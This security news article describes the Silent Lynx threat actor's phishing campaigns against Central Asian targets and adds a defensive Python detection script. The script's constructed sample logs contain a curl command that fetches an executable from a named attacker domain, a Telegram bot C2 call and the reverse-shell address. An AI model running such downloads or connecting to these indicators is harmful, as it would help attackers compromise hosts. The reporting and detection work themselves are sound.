A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.
“This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector,” Seqrite Labs researcher Subhajeet Singha said in a technical report published late last month.
Targets of the hacking group’s attacks include embassies, lawyers, government-backed banks, and think tanks. The activity has been attributed to a Kazakhstan-origin threat actor with a medium level of confidence.
The infections begin with a spear-phishing email containing a RAR archive attachment that ultimately acts as a delivery vehicle for malicious payloads responsible for granting remote access to the compromised hosts.
The first of the two campaigns, detected by the cybersecurity company on December 27, 2024, leverages the RAR archive to launch an ISO file that, in turn, includes a malicious C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that uses Telegram bots (named “@south_korea145_bot” and “@south_afr_angl_bot”) for command execution and data exfiltration.
Some of the commands executed via the bots include curl commands to download and save additional payloads from a remote server (“pweobmxdlboi[.]com”) or Google Drive.
The other campaign, in contrast, employs a malicious RAR archive containing two files: a decoy PDF and a Golang executable, the latter of which is designed to establish a reverse shell to an attacker-controlled server (“185.122.171[.]22:8082”).
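The two campaigns above leave distinct traces on an endpoint: PowerShell spawning curl to fetch a second stage from the named domain or Google Drive, curl or PowerShell talking to the Telegram Bot API, and an outbound connection to the reverse-shell socket. The script below is an added example of turning those observations into detection rules over endpoint telemetry; it is not code from the Seqrite Labs report or from the article. The indicators (the domain, the IP:port pair, and the two bot names) are taken from the text; the Sysmon-style JSON log lines are constructed for illustration, and the assumption that Telegram bots are driven through api.telegram.org, and that Google Drive downloads come from drive.google.com or docs.google.com, is mine rather than the report's.

```python
"""Hypothetical detection rules for the Silent Lynx tradecraft described above.

The log lines below are CONSTRUCTED (Sysmon-style JSON events), not real
telemetry. Indicators are quoted from the article with defanging brackets
removed; the Telegram API host and Google Drive hosts are assumptions.
"""
import json
import re
from typing import Dict, List, Set

# Indicators quoted in the article.
IOC_DOMAINS = {"pweobmxdlboi.com"}
IOC_SOCKETS = {("185.122.171.22", 8082)}
IOC_TELEGRAM_BOTS = {"south_korea145_bot", "south_afr_angl_bot"}

# Assumptions (not stated in the article): the Bot API endpoint used by
# Telegram bots, and the hosts a Google Drive download would come from.
TELEGRAM_API_HOST = "api.telegram.org"
GOOGLE_DRIVE_HOSTS = {"drive.google.com", "docs.google.com"}

# CONSTRUCTED sample events, one JSON object per line. The <TOKEN> value is a
# placeholder, not a real bot token.
SAMPLE_LOG = r"""
{"event": "process_create", "host": "WS01", "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "curl.exe -s -o C:\\Users\\Public\\up.exe http://pweobmxdlboi.com/up.exe"}
{"event": "process_create", "host": "WS01", "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "curl.exe -s https://api.telegram.org/bot<TOKEN>/getUpdates"}
{"event": "network_connect", "host": "WS02", "image": "C:\\Users\\u\\AppData\\Local\\Temp\\report.exe", "dst_ip": "185.122.171.22", "dst_port": 8082}
{"event": "network_connect", "host": "WS02", "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "dst_ip": "203.0.113.10", "dst_port": 443}
{"event": "process_create", "host": "WS03", "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "curl.exe -O https://example.org/tool.zip"}
"""

_URL_HOST = re.compile(r"https?://([^/\s\"']+)")


def _hosts_in(command_line: str) -> Set[str]:
    """Extract lower-cased hostnames (port stripped) from http(s) URLs in a command line."""
    return {h.split(":")[0].lower() for h in _URL_HOST.findall(command_line)}


def classify_event(ev: Dict) -> List[str]:
    """Return the names of the rules an event matches; an empty list means benign."""
    hits: List[str] = []
    kind = ev.get("event")
    if kind == "process_create":
        image = ev.get("image", "").lower()
        parent = ev.get("parent_image", "").lower()
        cmd = ev.get("command_line", "")
        hosts = _hosts_in(cmd)
        # Atomic indicator: the staging domain named in the report.
        if hosts & IOC_DOMAINS:
            hits.append("ioc_domain")
        # Telegram-based C2: Bot API host or one of the two reported bot names.
        if TELEGRAM_API_HOST in hosts or any(b in cmd for b in IOC_TELEGRAM_BOTS):
            hits.append("telegram_bot_c2")
        # Behavioural rule from the first campaign: PowerShell driving curl to
        # pull a payload from the web, with Google Drive called out separately.
        if parent.endswith("powershell.exe") and image.endswith("curl.exe") and hosts:
            if hosts & GOOGLE_DRIVE_HOSTS:
                hits.append("powershell_curl_gdrive")
            else:
                hits.append("powershell_curl_download")
    elif kind == "network_connect":
        # Second campaign: the Golang implant's reverse-shell destination.
        if (ev.get("dst_ip"), ev.get("dst_port")) in IOC_SOCKETS:
            hits.append("ioc_reverse_shell_socket")
    return hits


def scan_log(text: str) -> List[Dict]:
    """Parse newline-delimited JSON events and return only the ones that alert."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        rules = classify_event(ev)
        if rules:
            alerts.append({"host": ev.get("host"), "event": ev.get("event"), "rules": rules})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Run against the constructed log, the first two events fire on the staging domain, the Telegram Bot API host and the PowerShell-to-curl chain, the third fires on the reverse-shell socket, and the Firefox and cmd.exe-driven events stay quiet. The behavioural rule is the durable one: the domain and IP will rotate, but a PowerShell parent launching curl to fetch an executable is worth an alert regardless of destination.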
Seqrite Labs said it observed some level of tactical overlap between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting the Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.
“Silent Lynx’s campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants,” Singha said.
“Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, also highlights their focus on espionage in Central Asia and SPECA-based nations.”